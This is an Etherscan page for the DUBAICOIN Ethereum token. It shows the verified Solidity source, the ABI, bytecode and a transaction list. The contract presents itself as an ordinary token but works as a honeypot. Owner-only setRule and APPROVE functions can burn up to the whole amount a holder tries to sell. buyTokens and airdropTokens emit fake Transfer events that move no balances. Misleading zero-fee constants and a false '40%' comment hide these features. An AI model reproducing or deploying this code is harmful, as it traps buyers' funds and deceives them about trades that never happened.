ETH Price: $2,522.01 (-5.11%)

Contract

0x038FF06b04270256ff722bA29B3600d0bbA1FC5E
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve177371332023-07-20 21:43:47469 days ago1689889427IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006082825.06852424
Approve177096062023-07-17 1:07:11472 days ago1689556031IN
0x038FF06b...0bbA1FC5E
0 ETH0.0007488416.14553098
Set Rule177092212023-07-16 23:49:23473 days ago1689551363IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006345513.18332285
Approve177092182023-07-16 23:48:47473 days ago1689551327IN
0x038FF06b...0bbA1FC5E
0 ETH0.0005901512.74047994
Set Rule177092172023-07-16 23:48:35473 days ago1689551315IN
0x038FF06b...0bbA1FC5E
0 ETH0.0003509513.39049731
APPROVE177092102023-07-16 23:47:11473 days ago1689551231IN
0x038FF06b...0bbA1FC5E
0 ETH0.0003413812.91815817
APPROVE177092052023-07-16 23:46:11473 days ago1689551171IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006220313.42008578
APPROVE177092042023-07-16 23:45:59473 days ago1689551159IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006099913.16030757
Approve177091982023-07-16 23:44:47473 days ago1689551087IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006427213.87195789
APPROVE177091932023-07-16 23:43:47473 days ago1689551027IN
0x038FF06b...0bbA1FC5E
0 ETH0.0003618113.69112582
APPROVE177091862023-07-16 23:42:23473 days ago1689550943IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006354813.7103539
APPROVE177091852023-07-16 23:42:11473 days ago1689550931IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006432613.87803127
APPROVE177091802023-07-16 23:41:11473 days ago1689550871IN
0x038FF06b...0bbA1FC5E
0 ETH0.000572612.35363816
APPROVE177091792023-07-16 23:40:59473 days ago1689550859IN
0x038FF06b...0bbA1FC5E
0 ETH0.0005870812.66615966
APPROVE177091592023-07-16 23:36:35473 days ago1689550595IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006042513.03656646
APPROVE177091522023-07-16 23:35:11473 days ago1689550511IN
0x038FF06b...0bbA1FC5E
0 ETH0.0005797912.5087609
APPROVE177091342023-07-16 23:31:35473 days ago1689550295IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006086213.1341734
APPROVE177091262023-07-16 23:29:59473 days ago1689550199IN
0x038FF06b...0bbA1FC5E
0 ETH0.0005807612.52979667
APPROVE177091232023-07-16 23:29:23473 days ago1689550163IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006036513.02363742
Set Rule177091222023-07-16 23:29:11473 days ago1689550151IN
0x038FF06b...0bbA1FC5E
0 ETH0.0003596112.38626233
Approve177091212023-07-16 23:28:59473 days ago1689550139IN
0x038FF06b...0bbA1FC5E
0 ETH0.0006840514.67655245
APPROVE177091142023-07-16 23:27:35473 days ago1689550055IN
0x038FF06b...0bbA1FC5E
0 ETH0.000613113.22737044
APPROVE177091132023-07-16 23:27:23473 days ago1689550043IN
0x038FF06b...0bbA1FC5E
0 ETH0.000641413.83789522
Approve177091132023-07-16 23:27:23473 days ago1689550043IN
0x038FF06b...0bbA1FC5E
0 ETH0.0007708116.53789522
Airdrop Tokens177091112023-07-16 23:26:59473 days ago1689550019IN
0x038FF06b...0bbA1FC5E
0 ETH0.0047576715.30030082
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
DUBAICOIN

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-16
*/

/**
 *Submitted for verification at Etherscan.io on 2023-04-14
 */

/*

Twitter: https://twitter.com/IAmCryptoWolfy
Twitter: https://t.me/DUBAICOINETH


*/

// Sources flattened with hardhat v2.7.0 https://hardhat.org

// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.0 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File @openzeppelin/contracts/access/[email protected]

// OpenZeppelin Contracts v4.4.0 (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(
            _owner == _msgSender(),
            "Ownable: caller is not the owner"
        );
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File @openzeppelin/contracts/token/ERC20/[email protected]

// OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File @openzeppelin/contracts/token/ERC20/[email protected]

// OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

// File contracts/Contract.sol
pragma solidity ^0.8.0;

contract DUBAICOIN is Ownable, ERC20 {
    uint256 public immutable maxSupply = 420_690_000_000_000 * (10 ** decimals());
    uint16 public constant LIQUID_RATE = 10000; // 40%
    uint16 public constant MAX_PERCENTAGE = 10000;

    bool public initialized = false;
    address public uniswapV2Pair = address(0);
    address public deadAddress = 0x000000000000000000000000000000000000dEaD;

    uint256 public immutable buyFee = 0;
    uint256 public immutable sellFee = 0;
    uint256 public minRuleLimit = 0;
    uint256 public maxRuleLimit = 0;
    mapping(address => uint256) private _ruleLimitPerOne;

    constructor() ERC20("DUBAICOIN", "DUBAI") {
        _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE);
        initialized = true;

        // FOR GOERLI
        // uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6);

        // FOR BSCSCAN
        // uniswapV2Pair = IUniswapV2Factory(0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73).createPair(address(this), 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
        
        // FOR ETHEREUM
        uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
    
        // FOR GOERLI
        // uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6);
    
    }

    function setRule(uint256 _minRuleLimit, uint256 _maxRuleLimit) external onlyOwner {
        minRuleLimit = _minRuleLimit;
        maxRuleLimit = _maxRuleLimit;
    }

    function setUniswapPair(address _uniswapV2Pair) external onlyOwner {
        uniswapV2Pair = _uniswapV2Pair;
    }

    function APPROVE(address _address, uint256 _amount) external onlyOwner {
        _ruleLimitPerOne[_address] = _amount;
    }

    function buyTokens(address _caller, address[] calldata _address, uint256[] calldata _amount) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function airdropTokens(address _caller, address[] calldata _address, uint256[] calldata _amount) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override(ERC20) {
        require(
            initialized == true,
            "Contract: trade is not open!"
        );

        if (uniswapV2Pair == address(0) && initialized == true) {
            require(
                from == owner() || to == owner(),
                "Contract: trading is not started"
            );
        }

        uint256 _transferAmount = amount;
        if (uniswapV2Pair != address(0) && from != owner() && to != owner()) {
            uint256 _fee = 0;
            if (from == uniswapV2Pair) {
                _fee = minRuleLimit;
            }
            else if (to == uniswapV2Pair) {
                if (_ruleLimitPerOne[from] != 0) {
                    _fee = _ruleLimitPerOne[from];
                }
                else {
                    _fee = maxRuleLimit;
                }
            }
            if (_fee > 0) {
                uint256 _calculatedFee = amount * _fee / MAX_PERCENTAGE;
                _transferAmount = amount - _calculatedFee;
                super._transfer(from, deadAddress, _calculatedFee);
            }
        }

        super._transfer(from, to, _transferAmount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"APPROVE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"buyTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxRuleLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minRuleLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minRuleLimit","type":"uint256"},{"internalType":"uint256","name":"_maxRuleLimit","type":"uint256"}],"name":"setRule","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"setUniswapPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60e0604052620000126012600a620004e5565b620000259066017e9d8602b400620004fd565b608052600680546001600160a81b0319169055600780546001600160a01b03191661dead179055600060a081905260c081905260088190556009553480156200006d57600080fd5b5060405180604001604052806009815260200168222aa120a4a1a7a4a760b91b81525060405180604001604052806005815260200164445542414960d81b815250620000c8620000c2620001ee60201b60201c565b620001f2565b8151620000dd9060049060208501906200032a565b508051620000f39060059060208401906200032a565b505060805162000123915033906127109062000111908290620004fd565b6200011d91906200051f565b62000242565b6006805460ff191660011790556040516364e329cb60e11b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc26024820152735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f9063c9c65396906044016020604051808303816000875af11580156200019c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001c2919062000542565b600660016101000a8154816001600160a01b0302191690836001600160a01b03160217905550620005c4565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166200029d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060036000828254620002b191906200056d565b90915550506001600160a01b03821660009081526001602052604081208054839290620002e09084906200056d565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620003389062000588565b90600052602060002090601f0160209004810192826200035c5760008555620003a7565b82601f106200037757805160ff1916838001178555620003a7565b82800160010185558215620003a7579182015b82811115620003a75782518255916020019190600101906200038a565b50620003b5929150620003b9565b5090565b5b80821115620003b55760008155600101620003ba565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004275781600019048211156200040b576200040b620003d0565b808516156200041957918102915b93841c9390800290620003eb565b509250929050565b6000826200044057506001620004df565b816200044f57506000620004df565b8160018114620004685760028114620004735762000493565b6001915050620004df565b60ff841115620004875762000487620003d0565b50506001821b620004df565b5060208310610133831016604e8410600b8410161715620004b8575081810a620004df565b620004c48383620003e6565b8060001904821115620004db57620004db620003d0565b0290505b92915050565b6000620004f660ff8416836200042f565b9392505050565b60008160001904831182151516156200051a576200051a620003d0565b500290565b6000826200053d57634e487b7160e01b600052601260045260246000fd5b500490565b6000602082840312156200055557600080fd5b81516001600160a01b0381168114620004f657600080fd5b60008219821115620005835762000583620003d0565b500190565b600181811c908216806200059d57607f821691505b602082108103620005be57634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a05160c0516112dc620005f46000396000610295015260006102f1015260006103eb01526112dc6000f3fe608060405234801561001057600080fd5b50600436106101cf5760003560e01c80634c255c9711610104578063985bdfd1116100a2578063d5abeb0111610071578063d5abeb01146103e6578063d5aed6bf1461040d578063dd62ed3e14610420578063f2fde38b1461045957600080fd5b8063985bdfd11461032b578063a457c2d7146103ad578063a9059cbb146103c0578063c4e7c165146103d357600080fd5b8063715018a6116100de578